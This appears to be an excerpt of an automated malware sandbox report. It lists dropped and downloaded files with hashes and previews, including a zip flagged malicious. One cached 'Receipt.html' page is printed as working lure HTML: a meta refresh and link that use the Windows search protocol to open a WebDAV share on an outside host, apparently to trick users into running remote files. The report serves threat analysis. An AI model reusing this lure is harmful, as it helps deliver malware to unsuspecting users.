                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                      C:\Users\user\AppData\Local\Temp\acrocef_low\eb5d7f36-1bbc-4896-bf54-3178ffdecace.tmp

                      Download File
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                      Category:dropped
                      Size (bytes):386528
                      Entropy (8bit):7.9736851559892425
                      Encrypted:false
                      SSDEEP:
                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                      Malicious:false
                      Reputation:unknown
                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 10 14:04:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2679
                      Entropy (8bit):4.010419779458636
                      Encrypted:false
                      SSDEEP:
                      MD5:E657673F69C6F8C72E90BCC6B1FCF530
                      SHA1:ACD0701814F519B50BA36FBCBE131AE63B74EFCE
                      SHA-256:270E9145C959F61370D39100C4CE534B8B125113FFC2EC3E60FCBBDB640B821F
                      SHA-512:40634BE2C6EE3A7B69997ED69B9F3AA0B8EC98247EF359BA2521758399110CB1048757348E8F62AD774F8BF4BE9CFD226AAFA6FD673B9F493297F03F40269F42
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,....E....K......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.x....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.x....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.x....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.x...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.x...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2693
                      Entropy (8bit):4.019902454270629
                      Encrypted:false
                      SSDEEP:
                      MD5:AAF0ECDAEAF18A8364710360DABCE0FA
                      SHA1:DDE5A008F934C811D7AD396864DF16F45A0D08E5
                      SHA-256:5D58431998B15401F3A62CCE3FA4F28F57591938A907CC2F291AA59D38067DD1
                      SHA-512:539ED9DCDFC235F6CC6F2DD548251CAD0B370BF64478DC99E7411FECE659E3C41B246E4CE6C95BE160999DAEC6E9EC17D44C84F51C943236D6E508F185CC9C97
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.x....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.x....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.x....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.x...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 10 14:04:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2681
                      Entropy (8bit):4.0114690239797675
                      Encrypted:false
                      SSDEEP:
                      MD5:F6EDE35527EDF94C0115868015567EA0
                      SHA1:E7B28172685F5073968679347FC5B0DE72180803
                      SHA-256:DDC54B47D6CF0E5EE372BCA06C0E92D9513B882DA694EFD324AB38E62337BBB6
                      SHA-512:421708F76F8FBBCE86313FBB9030168EBD4E377E39F776FCFE1F17C201BE4F45BE4BD5E9F777142D73303E8AE6B1F13FA75BC9F897EB4467553F6EFDC3C123AD
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,......z..K......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.x....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.x....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.x....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.x...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.x...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 10 14:04:24 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2681
                      Entropy (8bit):3.9987709712197774
                      Encrypted:false
                      SSDEEP:
                      MD5:29355E28BEBFC0CB68832EF0BF41A66D
                      SHA1:5B8847779F6ADE35BB6FCE81B8930D4D8EAF9B13
                      SHA-256:FD07D7BB847BCB374C67DBFDE4069B0EEDC8D9F25B9844E35E339F1221CB3239
                      SHA-512:BB8EC5DCFD32FEB65BBB63F4FCC0BE2F44B7687D1FED1A88C9FB25E68317B4C2EB0F3F1D9B20F30051ECCA7BE9FE0DEFDC890856A2BB7EF739F1A40CF1DC5312
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,.........K......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.x....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.x....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.x....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.x...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.x...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 10 14:04:23 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                      Category:dropped
                      Size (bytes):2683
                      Entropy (8bit):4.009385743130322
                      Encrypted:false
                      SSDEEP:
                      MD5:68ECC0CFC669782589B57004A37AEE6C
                      SHA1:A59840B996AB9748239C394CDA6EDCDF38293F6C
                      SHA-256:1C7C83A7A9DFF1E97EC22C62CFA227A3E3B7AEFDE8DC6E02763F340F12F2E750
                      SHA-512:32535E4A13D191C1661383A2462BBEC6CE99DA1D6FAAB9DDE997347741554E9220E58EF9694E202F56D17B5F8F6DF1874F87CF505F7EF20AC87EF6A9C8C111DD
                      Malicious:false
                      Reputation:unknown
                      Preview:L..................F.@.. ...$+.,.....q..K......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Y.x....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.x....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.Y.x....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.Y.x...........................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.Y.x...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Z......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                      C:\Users\user\Downloads\downloaded.zip

                      Download File
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                      Category:modified
                      Size (bytes):48692427
                      Entropy (8bit):7.995506826817154
                      Encrypted:true
                      SSDEEP:
                      MD5:5D26B64E0A310E48EA3712D7B2407446
                      SHA1:AE16F8E1FFC752BB906CCDD7004D4FD354FBFEED
                      SHA-256:0CBDFB40DC0F56B9AD7EB3E8D8705C4C711773D445DC3857C76C48900ABA8CEC
                      SHA-512:E687A44F89C97726DE5FA368ABFE9D89A5C8F37678184C78885EA3179093825B36A321D95FD6C67B7E03ED37E90AB4C8917A3FD9E15C2675A99E97ED74DEF454
                      Malicious:true
                      Reputation:unknown
                      Preview:PK...........X................Python/Launcher/PK........Vv.Xn...44..........Python/Launcher/py.exe.{|.E...L..Cz....!@.h.#.H...$*..1...X..8."tC\..;....rwau....]v....$....<.1..(..]t+.j........$.{.......q.tWW.:u....).k..(....t]..../W.....AH..Z..c.{..,s..ug......w...L...z.a)..e.....{(}......^.l..!.2..+'O.3.t.H.........e#^d..G\...G.F8.......{n|wd6.[8b..p.,....p..oG..].y.}?.`;..'.W..X......f^..`.lI.F.<A...dy)A.8./..[......y...s;?..|.]...6v...M-..R.J.....[..`.u#.....P.F.p.......w...m......eU....L..a_.}a..a...K.$.H..</...+.......9....6(..}.Ep...W,.1.y_A.....K.[......<.\p....7S......u.og...c..:.>......u.....u.F[t.Wi.....A.."..5....b..?.^x'.w.U*bU.X.EW....bA}|.>.].........E.%P..7.c.=.NlP[i..Qu...N..8|.M..t.. l..f..}jm......>._*.>...v....p...P/...t}..#..Yi.C]bAG.k.<}.b.x..*.l.M.,.=.....k(,9..em.VLp.+T(.u..V(.3l.4.j.|z.....a........bh.:A;Aq......S.-.O. .Od[).....[G.Q...@....}z...p:.b.t. ..f.`F....~|...&u= ..U..P....f........F\...G/..)...c....&.?3...

                      Chrome Cache Entry: 211

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:data
                      Category:downloaded
                      Size (bytes):378880
                      Entropy (8bit):0.027257469432265917
                      Encrypted:false
                      SSDEEP:
                      MD5:F09C7B1A1E55FC0DF83F7D07BE0AD171
                      SHA1:B961F5CC0CAF20BD402087C61FCC9D7F3BC06E3F
                      SHA-256:3D413DCD90303E1DEE0203B230B8048E74A1FE14042986B366670E3EF8859F81
                      SHA-512:5D2E2CBB36710D69B9373E54AB55D46F71CEC834EFA9477C73C0A3C8AE4E5B29B868269021B9EFAE3F01F3D0195872B2015643E213041D8A67634F80E50C3017
                      Malicious:false
                      Reputation:unknown
                      URL:https://listafrica.org/Receipt.html
                      Preview:<link rel="icon" href="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png">....<meta property="og:image" content="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png"> .. <title>EBVSA890HBNXVA420</title>.... <meta http-equiv="refresh" content="0; URL=search:query=EBVSA890HBNXVA420&amp;crumb=location:\\kmaybelsrka.sbs@4843\DavWWWRoot\EBVSA890HBNXVA420&amp;displayname=Downloads">.. .. .. .... <p><a href="search:query=EBVSA890HBNXVA420&amp;crumb=location:\\kmaybelsrka.sbs@4843\DavWWWRoot\EBVSA890HBNXVA420&amp;displayname=Downloads">EBVSA890HBNXVA420 </a></p>.. ....</body></html>...........................................................................................................................................................................................................................................................................................................................................................................

                      Chrome Cache Entry: 212

                      Download File
                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                      File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                      Category:dropped
                      Size (bytes):7584
                      Entropy (8bit):7.771402547890117
                      Encrypted:false
                      SSDEEP:
                      MD5:17956A7275630ED70C693A72B11E67F3
                      SHA1:AA600A8D3F3026816674F7DCA1D1FAE6651AEDD6
                      SHA-256:96E34D83AD7BBB7ECF150EA8DAC6544F9AB2A6FC7BD40D8300CF6D4CD7679DD2
                      SHA-512:CAA7428CA8C5ADAA405FE6E95F64992482A590B6452EE94040E0BF80E1F167000609D9795281EDA3CED0C9CD00D489F620A44E8FCC4E9C4963590D4E245384F2
                      Malicious:false
                      Reputation:unknown
                      Preview:.PNG........IHDR.............\r.f....pHYs...........~....RIDATx..]K.e.U.U]v.u.i..J.d....Et#!.p.....I&.e..H.!..d.#ELq.Hd..0...b......x.1....E.....zos.......>.{.kI.U].[...^....3.....&>....................... ...@............................ ...@............................ ...@............................ ...@........c+..666..M~t.j..S.......*>r5.7_.....W...;..#..`..M~...4..R.....lx...vC.w.Q..%.&.i...|]..)...>....A.Y=.&...../.VJ.m>.[.(.d..+.8^..".6........2.W....=d.@..pl.!....c..Go>..oc.....).>..G&..W.....$....n.c....%....$...... .`.............@.@.[}..?.'..~........U#.j..?...@..L..@. .............-|.#..ct...n.O?{K. .....r.....w~r<.]..x...........}...%.....|...z..s....+.ic.R.5....2..e....~......4........@.........H..jV.T.`.}..}..o0Ki.._7$pw...........T......-...P8A*../......y......._...=.?.._J.-.O..O...........~..H.........f..{.........Vb..........6S`..7..D$..@;~..2..@..g...o...U...d.......TR...........1.sf..[..../..!x2.....&h$.?[.....^....../..k.....M?.k

                      Static File Info

                      No static file info